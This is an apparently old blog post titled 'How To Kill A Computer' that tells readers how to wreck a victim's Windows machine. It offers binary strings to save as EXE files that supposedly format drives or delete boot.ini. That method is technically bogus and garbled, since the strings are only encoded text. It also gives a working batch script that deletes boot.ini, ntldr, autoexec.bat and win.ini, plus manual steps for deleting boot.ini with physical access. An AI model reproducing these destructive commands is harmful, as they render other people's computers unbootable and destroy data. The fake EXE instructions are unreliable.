How To Kill A Computer - Easy Methods

The first method, of course, is to format the hard drive. But making a BAT file is old, and people can prevent it. So these are some tricks that i found out.

To Format a C drive:
Copy/paste this into Notepad and save it as an EXE file (not BAT):

Code:
01001011000111110010010101010101010000011111100000
If that doesn't work, try this:
Code:
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
To Format a D drive:
Code:
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
To Format an A drive:

Code:
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
Deleting The Boot.ini

You can use the same method as above to create an EXE file that deletes the Boot.ini:

Code:
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
Deleting Boot.ini with a BAT file

Or if you prefer the old BAT command, save this in Notepad as a BAT file(although this deletes other files too):

Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
If you have physical access

Finally, if you have physical access to your victim's computer, you can delete the Boot.ini yourself manually. First, you have to enable viewing of Hidden/Operating System Files.

In Vista:
Open any folder, On the top left, click Organize>Folder &Search Option>Click on the view tab, then choose to show Hidden Files and uncheck the Hide protected operating system files box.

In windows XP:
Open any folder, click on the tools menu, then Folder options, click on the view tab, then choose to show Hidden Files and uncheck the Hide protected operating system files box.

After you have done this, go to my computer, then the main hard drive (most probably C) and look for the file boot.ini - Delete it permanently and you won't be able to boot windows again.

0 comments:

WordPress Theme: Blue Weed by Jai Nischal Verma | Ported by Ismail | Creative Commons Attribution-ShareAlike 2.5 License (2008).